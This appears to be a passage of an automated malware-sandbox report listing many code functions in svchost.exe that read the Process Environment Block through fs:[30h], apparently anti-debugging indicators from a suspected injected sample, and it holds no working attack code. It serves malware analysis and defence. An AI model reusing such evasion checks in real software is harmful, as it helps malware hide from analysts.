              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5270D mov eax, dword ptr fs:[00000030h]1_2_03C5270D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3471B mov eax, dword ptr fs:[00000030h]1_2_03C3471B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3471B mov eax, dword ptr fs:[00000030h]1_2_03C3471B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C306CF mov eax, dword ptr fs:[00000030h]1_2_03C306CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA6C0 mov eax, dword ptr fs:[00000030h]1_2_03CFA6C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD86C2 mov eax, dword ptr fs:[00000030h]1_2_03CD86C2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC66D0 mov eax, dword ptr fs:[00000030h]1_2_03CC66D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC66D0 mov eax, dword ptr fs:[00000030h]1_2_03CC66D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C6E0 mov eax, dword ptr fs:[00000030h]1_2_03C3C6E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C566E0 mov eax, dword ptr fs:[00000030h]1_2_03C566E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C566E0 mov eax, dword ptr fs:[00000030h]1_2_03C566E0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAC6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAC6F2 mov eax, dword ptr fs:[00000030h]1_2_03CAC6F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40680 mov eax, dword ptr fs:[00000030h]1_2_03C40680
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38690 mov eax, dword ptr fs:[00000030h]1_2_03C38690
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC691 mov eax, dword ptr fs:[00000030h]1_2_03CBC691
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF86A8 mov eax, dword ptr fs:[00000030h]1_2_03CF86A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF86A8 mov eax, dword ptr fs:[00000030h]1_2_03CF86A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C640 mov eax, dword ptr fs:[00000030h]1_2_03C6C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C640 mov eax, dword ptr fs:[00000030h]1_2_03C6C640
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6265C mov eax, dword ptr fs:[00000030h]1_2_03C6265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6265C mov ecx, dword ptr fs:[00000030h]1_2_03C6265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6265C mov eax, dword ptr fs:[00000030h]1_2_03C6265C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6666D mov esi, dword ptr fs:[00000030h]1_2_03C6666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6666D mov eax, dword ptr fs:[00000030h]1_2_03C6666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6666D mov eax, dword ptr fs:[00000030h]1_2_03C6666D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE660 mov eax, dword ptr fs:[00000030h]1_2_03CBE660
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30670 mov eax, dword ptr fs:[00000030h]1_2_03C30670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72670 mov eax, dword ptr fs:[00000030h]1_2_03C72670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72670 mov eax, dword ptr fs:[00000030h]1_2_03C72670
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04600 mov eax, dword ptr fs:[00000030h]1_2_03D04600
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C620 mov eax, dword ptr fs:[00000030h]1_2_03C6C620
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30630 mov eax, dword ptr fs:[00000030h]1_2_03C30630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60630 mov eax, dword ptr fs:[00000030h]1_2_03C60630
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8633 mov esi, dword ptr fs:[00000030h]1_2_03CB8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8633 mov eax, dword ptr fs:[00000030h]1_2_03CB8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8633 mov eax, dword ptr fs:[00000030h]1_2_03CB8633
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C5C6 mov eax, dword ptr fs:[00000030h]1_2_03C6C5C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB05C6 mov eax, dword ptr fs:[00000030h]1_2_03CB05C6
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C665D0 mov eax, dword ptr fs:[00000030h]1_2_03C665D0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5E7 mov ebx, dword ptr fs:[00000030h]1_2_03C6A5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A5E7 mov eax, dword ptr fs:[00000030h]1_2_03C6A5E7
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC5FC mov eax, dword ptr fs:[00000030h]1_2_03CBC5FC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE588 mov eax, dword ptr fs:[00000030h]1_2_03CAE588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE588 mov eax, dword ptr fs:[00000030h]1_2_03CAE588
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A580 mov eax, dword ptr fs:[00000030h]1_2_03C6A580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A580 mov eax, dword ptr fs:[00000030h]1_2_03C6A580
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C62594 mov eax, dword ptr fs:[00000030h]1_2_03C62594
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC592 mov eax, dword ptr fs:[00000030h]1_2_03CBC592
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB85AA mov eax, dword ptr fs:[00000030h]1_2_03CB85AA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C345B0 mov eax, dword ptr fs:[00000030h]1_2_03C345B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C345B0 mov eax, dword ptr fs:[00000030h]1_2_03C345B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E547 mov eax, dword ptr fs:[00000030h]1_2_03C4E547
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C66540 mov eax, dword ptr fs:[00000030h]1_2_03C66540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C68540 mov eax, dword ptr fs:[00000030h]1_2_03C68540
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3254C mov eax, dword ptr fs:[00000030h]1_2_03C3254C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6550 mov eax, dword ptr fs:[00000030h]1_2_03CC6550
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA553 mov eax, dword ptr fs:[00000030h]1_2_03CFA553
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4C560 mov eax, dword ptr fs:[00000030h]1_2_03C4C560
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E507 mov eax, dword ptr fs:[00000030h]1_2_03C5E507
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32500 mov eax, dword ptr fs:[00000030h]1_2_03C32500
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C50D mov eax, dword ptr fs:[00000030h]1_2_03C6C50D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C50D mov eax, dword ptr fs:[00000030h]1_2_03C6C50D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC51D mov eax, dword ptr fs:[00000030h]1_2_03CBC51D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4252B mov eax, dword ptr fs:[00000030h]1_2_03C4252B
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C72539 mov eax, dword ptr fs:[00000030h]1_2_03C72539
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C544D1 mov eax, dword ptr fs:[00000030h]1_2_03C544D1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C544D1 mov eax, dword ptr fs:[00000030h]1_2_03C544D1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E4EF mov eax, dword ptr fs:[00000030h]1_2_03C6E4EF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E4EF mov eax, dword ptr fs:[00000030h]1_2_03C6E4EF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C364F0 mov eax, dword ptr fs:[00000030h]1_2_03C364F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A4F0 mov eax, dword ptr fs:[00000030h]1_2_03C6A4F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A4F0 mov eax, dword ptr fs:[00000030h]1_2_03C6A4F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE4F2 mov eax, dword ptr fs:[00000030h]1_2_03CBE4F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE4F2 mov eax, dword ptr fs:[00000030h]1_2_03CBE4F2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30485 mov ecx, dword ptr fs:[00000030h]1_2_03C30485
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6648A mov eax, dword ptr fs:[00000030h]1_2_03C6648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6648A mov eax, dword ptr fs:[00000030h]1_2_03C6648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6648A mov eax, dword ptr fs:[00000030h]1_2_03C6648A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBC490 mov eax, dword ptr fs:[00000030h]1_2_03CBC490
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C324A2 mov eax, dword ptr fs:[00000030h]1_2_03C324A2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C324A2 mov ecx, dword ptr fs:[00000030h]1_2_03C324A2
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C644A8 mov eax, dword ptr fs:[00000030h]1_2_03C644A8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC84BB mov eax, dword ptr fs:[00000030h]1_2_03CC84BB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E4BC mov eax, dword ptr fs:[00000030h]1_2_03C6E4BC
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40445 mov eax, dword ptr fs:[00000030h]1_2_03C40445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40445 mov eax, dword ptr fs:[00000030h]1_2_03C40445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40445 mov eax, dword ptr fs:[00000030h]1_2_03C40445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40445 mov eax, dword ptr fs:[00000030h]1_2_03C40445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40445 mov eax, dword ptr fs:[00000030h]1_2_03C40445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40445 mov eax, dword ptr fs:[00000030h]1_2_03C40445
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0443 mov eax, dword ptr fs:[00000030h]1_2_03CB0443
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E45E mov eax, dword ptr fs:[00000030h]1_2_03C5E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E45E mov eax, dword ptr fs:[00000030h]1_2_03C5E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E45E mov eax, dword ptr fs:[00000030h]1_2_03C5E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E45E mov eax, dword ptr fs:[00000030h]1_2_03C5E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E45E mov eax, dword ptr fs:[00000030h]1_2_03C5E45E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBE461 mov eax, dword ptr fs:[00000030h]1_2_03CBE461
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA464 mov eax, dword ptr fs:[00000030h]1_2_03CFA464
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38470 mov eax, dword ptr fs:[00000030h]1_2_03C38470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38470 mov eax, dword ptr fs:[00000030h]1_2_03C38470
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6400 mov eax, dword ptr fs:[00000030h]1_2_03CC6400
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC6400 mov eax, dword ptr fs:[00000030h]1_2_03CC6400
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2640D mov eax, dword ptr fs:[00000030h]1_2_03C2640D
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2EBC0 mov eax, dword ptr fs:[00000030h]1_2_03C2EBC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4BC0 mov eax, dword ptr fs:[00000030h]1_2_03CB4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4BC0 mov eax, dword ptr fs:[00000030h]1_2_03CB4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4BC0 mov eax, dword ptr fs:[00000030h]1_2_03CB4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4BC0 mov eax, dword ptr fs:[00000030h]1_2_03CB4BC0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD6BDE mov ebx, dword ptr fs:[00000030h]1_2_03CD6BDE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD6BDE mov eax, dword ptr fs:[00000030h]1_2_03CD6BDE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58BD1 mov eax, dword ptr fs:[00000030h]1_2_03C58BD1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58BD1 mov eax, dword ptr fs:[00000030h]1_2_03C58BD1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04BE0 mov eax, dword ptr fs:[00000030h]1_2_03D04BE0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8BBE mov eax, dword ptr fs:[00000030h]1_2_03CF8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8BBE mov eax, dword ptr fs:[00000030h]1_2_03CF8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8BBE mov eax, dword ptr fs:[00000030h]1_2_03CF8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF8BBE mov eax, dword ptr fs:[00000030h]1_2_03CF8BBE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3AB70 mov eax, dword ptr fs:[00000030h]1_2_03C3AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3AB70 mov eax, dword ptr fs:[00000030h]1_2_03C3AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3AB70 mov eax, dword ptr fs:[00000030h]1_2_03C3AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3AB70 mov eax, dword ptr fs:[00000030h]1_2_03C3AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3AB70 mov eax, dword ptr fs:[00000030h]1_2_03C3AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3AB70 mov eax, dword ptr fs:[00000030h]1_2_03C3AB70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36B70 mov eax, dword ptr fs:[00000030h]1_2_03C36B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36B70 mov eax, dword ptr fs:[00000030h]1_2_03C36B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36B70 mov eax, dword ptr fs:[00000030h]1_2_03C36B70
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04B67 mov eax, dword ptr fs:[00000030h]1_2_03D04B67
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE6B77 mov eax, dword ptr fs:[00000030h]1_2_03CE6B77
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C64B79 mov eax, dword ptr fs:[00000030h]1_2_03C64B79
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38B10 mov eax, dword ptr fs:[00000030h]1_2_03C38B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38B10 mov eax, dword ptr fs:[00000030h]1_2_03C38B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C38B10 mov eax, dword ptr fs:[00000030h]1_2_03C38B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40B10 mov eax, dword ptr fs:[00000030h]1_2_03C40B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40B10 mov eax, dword ptr fs:[00000030h]1_2_03C40B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40B10 mov eax, dword ptr fs:[00000030h]1_2_03C40B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40B10 mov eax, dword ptr fs:[00000030h]1_2_03C40B10
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EB1C mov eax, dword ptr fs:[00000030h]1_2_03C5EB1C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2CB1E mov eax, dword ptr fs:[00000030h]1_2_03C2CB1E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6CB20 mov eax, dword ptr fs:[00000030h]1_2_03C6CB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCB20 mov eax, dword ptr fs:[00000030h]1_2_03CBCB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCB20 mov eax, dword ptr fs:[00000030h]1_2_03CBCB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBCB20 mov eax, dword ptr fs:[00000030h]1_2_03CBCB20
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40ACE mov eax, dword ptr fs:[00000030h]1_2_03C40ACE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40ACE mov eax, dword ptr fs:[00000030h]1_2_03C40ACE
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50AEB mov eax, dword ptr fs:[00000030h]1_2_03C50AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50AEB mov eax, dword ptr fs:[00000030h]1_2_03C50AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50AEB mov eax, dword ptr fs:[00000030h]1_2_03C50AEB
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AED mov eax, dword ptr fs:[00000030h]1_2_03C30AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AED mov eax, dword ptr fs:[00000030h]1_2_03C30AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30AED mov eax, dword ptr fs:[00000030h]1_2_03C30AED
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0AFF mov eax, dword ptr fs:[00000030h]1_2_03CB0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0AFF mov eax, dword ptr fs:[00000030h]1_2_03CB0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0AFF mov eax, dword ptr fs:[00000030h]1_2_03CB0AFF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04AE8 mov eax, dword ptr fs:[00000030h]1_2_03D04AE8
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE6A80 mov eax, dword ptr fs:[00000030h]1_2_03CE6A80
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EA40 mov eax, dword ptr fs:[00000030h]1_2_03C5EA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5EA40 mov eax, dword ptr fs:[00000030h]1_2_03C5EA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CCAA40 mov eax, dword ptr fs:[00000030h]1_2_03CCAA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CCAA40 mov eax, dword ptr fs:[00000030h]1_2_03CCAA40
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4A57 mov eax, dword ptr fs:[00000030h]1_2_03CB4A57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4A57 mov eax, dword ptr fs:[00000030h]1_2_03CB4A57
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AA0E mov eax, dword ptr fs:[00000030h]1_2_03C6AA0E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6AA0E mov eax, dword ptr fs:[00000030h]1_2_03C6AA0E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C389C0 mov eax, dword ptr fs:[00000030h]1_2_03C389C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C389C0 mov eax, dword ptr fs:[00000030h]1_2_03C389C0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D029CF mov eax, dword ptr fs:[00000030h]1_2_03D029CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D029CF mov eax, dword ptr fs:[00000030h]1_2_03D029CF
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C309F0 mov eax, dword ptr fs:[00000030h]1_2_03C309F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C649F0 mov eax, dword ptr fs:[00000030h]1_2_03C649F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C649F0 mov eax, dword ptr fs:[00000030h]1_2_03C649F0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C98F mov eax, dword ptr fs:[00000030h]1_2_03C6C98F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C98F mov eax, dword ptr fs:[00000030h]1_2_03C6C98F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C98F mov eax, dword ptr fs:[00000030h]1_2_03C6C98F
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3E9A0 mov eax, dword ptr fs:[00000030h]1_2_03C3E9A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB89A0 mov eax, dword ptr fs:[00000030h]1_2_03CB89A0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C689B0 mov edx, dword ptr fs:[00000030h]1_2_03C689B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69B0 mov eax, dword ptr fs:[00000030h]1_2_03CC69B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69B0 mov eax, dword ptr fs:[00000030h]1_2_03CC69B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC69B0 mov ecx, dword ptr fs:[00000030h]1_2_03CC69B0
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C944 mov eax, dword ptr fs:[00000030h]1_2_03C6C944
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5E94E mov eax, dword ptr fs:[00000030h]1_2_03C5E94E
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54955 mov eax, dword ptr fs:[00000030h]1_2_03C54955
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C54955 mov eax, dword ptr fs:[00000030h]1_2_03C54955
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6C958 mov eax, dword ptr fs:[00000030h]1_2_03C6C958
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4096B mov eax, dword ptr fs:[00000030h]1_2_03C4096B
